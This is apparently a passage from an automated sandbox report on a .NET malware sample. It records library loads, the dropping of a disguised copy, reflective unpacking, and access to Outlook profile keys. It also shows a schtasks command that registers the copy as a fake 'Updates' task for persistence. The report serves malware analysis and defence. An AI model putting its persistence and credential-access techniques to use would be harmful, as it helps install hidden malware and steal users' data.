Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll

Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: ZTEIhNCtP3.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: ZTEIhNCtP3.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: ZTEIhNCtP3.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation

.NET source code contains potential unpacker

Source: ZTEIhNCtP3.exe, BackgroundForms.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: HgKRLOctZksk.exe.0.dr, BackgroundForms.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.ZTEIhNCtP3.exe.6ca0000.3.raw.unpack, MainForm.cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.ZTEIhNCtP3.exe.2abe1c8.0.raw.unpack, MainForm.cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.ZTEIhNCtP3.exe.6fd0000.4.raw.unpack, jT3T2CInaXkCOuraA6.cs	.Net Code: ay485ScsW7 System.Reflection.Assembly.Load(byte[])
Source: 8.2.HgKRLOctZksk.exe.2d8e250.0.raw.unpack, MainForm.cs	.Net Code: System.Reflection.Assembly.Load(byte[])

Source: ZTEIhNCtP3.exe

Static PE information: 0xF0F8D4D8 [Mon Feb 10 02:54:16 2098 UTC]

Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 0_2_0706F485 push FFFFFF8Bh; iretd	0_2_0706F487
Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Code function: 0_2_084506B0 pushfd ; ret	0_2_084506BD
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 8_2_071306B0 pushfd ; ret	8_2_071306BD
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 8_2_0756E6D5 push FFFFFF8Bh; iretd	8_2_0756E6D7
Source: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe	Code function: 8_2_075678C0 push esp; iretd	8_2_075678CD

Source: ZTEIhNCtP3.exe	Static PE information: section name: .text entropy: 7.792178295468793
Source: HgKRLOctZksk.exe.0.dr	Static PE information: section name: .text entropy: 7.792178295468793

Source: 0.2.ZTEIhNCtP3.exe.6fd0000.4.raw.unpack, Yehnq7q9brDYsjF223.cs	High entropy of concatenated method names: 'QGV5WcOsr', 'uDFnPlUbZ', 'TMXHG5eZr', 'k4h6ALEBk', 'GFBlidPBq', 'UN3gLlbsk', 'onpK3SFWMKwQnkjwUl', 'Go6In8R7Pl3spsMv4Q', 'DFdue4dsf', 'G3cYStOQu'
Source: 0.2.ZTEIhNCtP3.exe.6fd0000.4.raw.unpack, nNB9bk02t4L8jKOunL.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'e2fqXrnD99', 'poIqN7owq3', 'QotqzC3CdV', 'fpIT9VEWbD', 't3hT7T2Url', 'wK4TqJ5usU', 'ei2TTvfeeF', 'uk6C36W5e5vTpBd2rIv'
Source: 0.2.ZTEIhNCtP3.exe.6fd0000.4.raw.unpack, cfFv6tkGJAHLsX6QiT.cs	High entropy of concatenated method names: 'NfIZwYNx34', 'SGcZS70Lqu', 'RMQZ5RkLWH', 'mHXZnBUmP1', 'UEhZMilf7m', 'gZeZHiXnx9', 'v0JZ6vOY8W', 'VKCZGA3pAO', 'kdoZlr3ZMK', 'BlJZguU2wi'
Source: 0.2.ZTEIhNCtP3.exe.6fd0000.4.raw.unpack, PhL3oT77vgpaSG2ZKuI.cs	High entropy of concatenated method names: 'jj2YNDKjQC', 'zl9YzJ6wtu', 'FVYy9yepPy', 'A6Iy7y6Ynx', 'z4eyqxwuAR', 'biMyT0fudS', 's3ey8ah3Ju', 'bEyyLpSixw', 'gYWyFkkQqS', 'HLxybQ8kwf'
Source: 0.2.ZTEIhNCtP3.exe.6fd0000.4.raw.unpack, Q50JT2zr67sMdDug3x.cs	High entropy of concatenated method names: 'gRJYHp3WxK', 'GjcYGLKaun', 'oM1YlIGZNA', 'D3HYDQotR7', 'YaZYOQO2Wa', 'rvIY3CdVmE', 'VxcYRcpiag', 'VfXYABxEos', 'uAtYwsvS1m', 'dZHYSdqn4H'
Source: 0.2.ZTEIhNCtP3.exe.6fd0000.4.raw.unpack, two4fO794XLqbbUjCUY.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HNDYEgtxAv', 'cOIYKr1GnO', 'v9QY4eAY38', 'jxLYt6cOC2', 'yCnYUu95U9', 'gAqYdQmNNb', 'bdtYjGNPfc'
Source: 0.2.ZTEIhNCtP3.exe.6fd0000.4.raw.unpack, ITJtN4bVYoTUMnlG10.cs	High entropy of concatenated method names: 'Dispose', 'K0B7XrevCV', 'mw6qOoR7yp', 'LROVZtl6ZK', 'VKl7Nm2OF9', 'JwJ7z8JPGl', 'ProcessDialogKey', 'u3Aq9757Ii', 'e4Mq7AM0rd', 'bWuqqENiEm'
Source: 0.2.ZTEIhNCtP3.exe.6fd0000.4.raw.unpack, n6XJJ14MuJI7aWytZK.cs	High entropy of concatenated method names: 'BS4pGNERfM', 'TyMplFVGAD', 'mLcpDCUu4b', 'aiPpO9O0Pu', 'lkXp3gM6qa', 'M8bpRLKyy7', 'KKFpcK8sgt', 'Jc3phhyPLX', 'MBapi8jIMM', 'xEHpEn0Ssc'
Source: 0.2.ZTEIhNCtP3.exe.6fd0000.4.raw.unpack, kkm4celH5bbfBRThq6.cs	High entropy of concatenated method names: 'rnS0n0M5B3', 'bSX0H7WWhD', 'TII0GE7JbQ', 'XsE0l5aIcs', 'yRp0fumvIm', 'VSi0QZLIac', 'Kj90shx5ue', 'Bra0uMJq7Z', 'sBc02vTKkd', 'Rjs0YcEyCj'
Source: 0.2.ZTEIhNCtP3.exe.6fd0000.4.raw.unpack, ogmEX5gHuMpCZGROF3.cs	High entropy of concatenated method names: 'DBoVMgwLuN', 'VZdV6jaYWp', 'E9Q0WkG3kU', 'qpg03VkNBT', 'veW0Rea6F2', 'JtN0BTKATH', 'xQU0cQjZtk', 'ADO0hQPwxQ', 'ItY0k0OJyS', 'is80idpKZ4'
Source: 0.2.ZTEIhNCtP3.exe.6fd0000.4.raw.unpack, WKtcrB8tj8W3CJjO4J.cs	High entropy of concatenated method names: 'euE7ZW4D23', 'NCs7IDqJk7', 'vH57abbfBR', 'chq7x6fgmE', 'DRO7fF3ZZ8', 'm7y7QHOpou', 'rlJxkPV14agUwfNVlk', 'lFiN2JqCfDKGXZMqlF', 'DbX77Pbxqc', 'fyk7Tq3SfL'
Source: 0.2.ZTEIhNCtP3.exe.6fd0000.4.raw.unpack, ONiEmyNVhq0Vsa0MVF.cs	High entropy of concatenated method names: 'roFY0RQSrC', 'HYZYVe5mAH', 'LrxYCmFyBb', 'PfdYZ7BIqp', 'vL8Y21WSYO', 'qbEYI9C05p', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.ZTEIhNCtP3.exe.6fd0000.4.raw.unpack, ardDEN782Zy6GNBpt2l.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'FiNm27IGyg', 'nRdmYWjvfa', 'quSmymxXTC', 'oZDmmWV2nM', 'plfmeVGD4v', 'qGRmJnKZ3a', 'Sq5mA7TxQc'
Source: 0.2.ZTEIhNCtP3.exe.6fd0000.4.raw.unpack, puSKO8dnmyu7mlc2wD.cs	High entropy of concatenated method names: 'ToString', 'nyWQERdxPN', 'GosQOYPVwu', 'db9QWHnlay', 'XmBQ3df7Uw', 'a7bQRConlu', 'HENQBWhd2D', 'E2DQc1EopP', 'VpPQhK2rLV', 'GFOQkPvEht'
Source: 0.2.ZTEIhNCtP3.exe.6fd0000.4.raw.unpack, OW4D23GkCsDqJk7dQY.cs	High entropy of concatenated method names: 'QhZbt1Hgjw', 'cjubUCtJsL', 'maTbdPHu2L', 'EvHbjTW47N', 'kylbvnwwb1', 'jcBbrvkmnG', 'VlebPd2gnn', 'SFSbo9wLFQ', 'Hx2bXhPtDF', 'pQvbNWPeXB'
Source: 0.2.ZTEIhNCtP3.exe.6fd0000.4.raw.unpack, GxWoo9cNKW1tFs2BqX.cs	High entropy of concatenated method names: 'gNhZFkgkYS', 'ATMZ0sDS50', 'fXfZCYBrDj', 'wcOCNtWpjq', 'xnnCz9Hp5q', 'XDVZ9oxEZO', 'qYgZ7sXG3r', 'DufZq0XZV5', 'NGHZTyfHMb', 'IUIZ8Hb5og'
Source: 0.2.ZTEIhNCtP3.exe.6fd0000.4.raw.unpack, sfX23xjaDYi4u0j7OP.cs	High entropy of concatenated method names: 'hVJsaDVJmY', 'irfsxDxpya', 'ToString', 'XZSsF1LJLi', 'Ds6sbHVVlt', 'dlDs0phtN4', 'BQTsVsW19W', 'n23sCeO8m5', 'jlPsZcFuma', 'RlYsIZbfwm'
Source: 0.2.ZTEIhNCtP3.exe.6fd0000.4.raw.unpack, jT3T2CInaXkCOuraA6.cs	High entropy of concatenated method names: 'WQoTLQxIp2', 'CyoTFqAcoh', 'TUiTbrhf02', 'u9YT0F75KA', 'H2ETVLVSqU', 'tR1TC39AdW', 'Y6GTZ6ruOV', 'slATICJoUr', 'aF6T1lLhYt', 'JorTa3svX6'
Source: 0.2.ZTEIhNCtP3.exe.6fd0000.4.raw.unpack, jZ8a7yDHOpounP65xO.cs	High entropy of concatenated method names: 'rnuCLExHnl', 'jRnCbbJCWm', 'uTHCVgG8ja', 'ajPCZHVPIH', 'OgUCIttyV1', 'B3wVvQr4PS', 'NiVVrdVTbv', 'fkmVPSjio1', 'THVVooEHoJ', 'LBOVXhslgx'
Source: 0.2.ZTEIhNCtP3.exe.6fd0000.4.raw.unpack, w757IiXL4MAM0rd7Wu.cs	High entropy of concatenated method names: 'Ylv2DMxjjo', 'kvb2OtnFbl', 'KqO2WeGlhA', 'keU23s3JV3', 'RkQ2Ro6hlD', 'Wdd2BXUXoU', 'YLx2cUJ6Ea', 'gZE2h5DLVV', 'ktU2kbt4FO', 'RdT2ii3sAV'
Source: 0.2.ZTEIhNCtP3.exe.6fd0000.4.raw.unpack, wUvdrgriFU0vvSwvOD.cs	High entropy of concatenated method names: 'zIhsoAeUUA', 'B3csNMbefd', 'KAxu9miDGv', 'x1gu7X7UBN', 'jRYsECDiKR', 'O09sKMkSk0', 'I1es4xhk8U', 'SwXstT7tOa', 'Gu8sUpfXVk', 'TAYsdGKfND'
Source: 0.2.ZTEIhNCtP3.exe.6fd0000.4.raw.unpack, O2uEGbPBPc0BrevCVr.cs	High entropy of concatenated method names: 'uYL2f7pxZf', 'JgM2siUcf3', 'eju22ONMZA', 'RTl2yD2Pis', 'kOs2e8QZMh', 'tqd2ActL45', 'Dispose', 'sWOuFJ2wBn', 'S20ubr3cmd', 'rHJu0CQ5cU'

Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe

File created: C:\Users\user\AppData\Roaming\HgKRLOctZksk.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HgKRLOctZksk" /XML "C:\Users\user\AppData\Local\Temp\tmp9D03.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\ZTEIhNCtP3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
